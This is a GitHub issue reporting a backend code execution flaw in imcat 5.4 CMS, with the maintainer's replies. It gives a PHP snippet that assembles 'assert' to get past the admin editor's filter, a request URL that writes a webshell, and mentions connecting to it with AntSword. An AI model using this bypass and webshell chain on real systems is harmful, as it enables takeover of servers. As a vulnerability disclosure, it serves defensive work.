Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Code Execution Vulnerability in the background of imcat5.4 #8

Open
haungtongfu opened this issue Jun 18, 2021 · 3 comments
Open

Code Execution Vulnerability in the background of imcat5.4 #8

haungtongfu opened this issue Jun 18, 2021 · 3 comments

Comments

@haungtongfu
Copy link

1. Overview

Official website: http://txjia.com/imcat/

Version: imcat-5.4

Vulnerability type: Code Execution

Source code: https://github.com/peacexie/imcat/releases/tag/v5.4

PS: it is recommended to use php7.0.12 environment. Other environments will have different problems when loopholes recur

2. Source code analysis

In the background of the CMS, an online source code editing function is provided, and then dangerous functions are filtered through the file imcat-5.4, imcat, core, glib and safscan.php. However, due to the incomplete filtering rules of the filtering function, dangerous code can be written and executed, forming a loophole in code execution, The attacker can gain the permission of the server through this vulnerability
image

3. Reappearance

Use phpstudy to build the environment, and then log in to the background of the website

(1) Select tool - DIY configuration - select any file to modify. I choose index. PHP here
image

(2) Try to write a sentence
image
Then save it and find an error, because the filter rule in imcat-5.4, imcat, core, glib, safscan.php file is triggered
image

(3) Try to write
$ch = explode(".","hello.ass.world.er.t");
$c = $ch[1].$ch[3].$ch[4]; //assert
$d=$_GET['x'];
$c($d);
Successfully bypassed
image
image

(4) Visit
http://127.0.0.1/imcat/index.php?x= fputs(fopen('shell.php','w'),'')
This statement means to create a shell.php file in the same directory as index.php and write a sentence "Trojan horse
Although the page is wrong in reality, the statement has been executed successfully and shell.php has been generated in the same directory
image

(5) Use ant sword to connect

http://127.0.0.1/imcat/shell.php
image
image

4. Repair service suggestions

(1) Turn off the function of modifying the source code in the background

(2) Perfect the rules of detection (this is hard to implement)
@peacexie
Copy link
Owner

As you said: "Perfect the rules of detection (this is hard to implement)":
Good!, These code run before the filter code,
And in the DIY mode, You can remove the filter code too!

But, You can use master branch!
It was disabled by default at in master branch.

Sorry!
The DIY-mode, It was disabled by default only at master branch.
In v5.4, this feature was not update.

@haungtongfu
Copy link
Author

I suggest that DIY be disabled by default. Good luck

@haungtongfu
Copy link
Author

Can this vulnerability help me apply for a CVE? thank you!
Requesting a CVE identification number-GitHub Docs
image

Thinks.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@peacexie @haungtongfu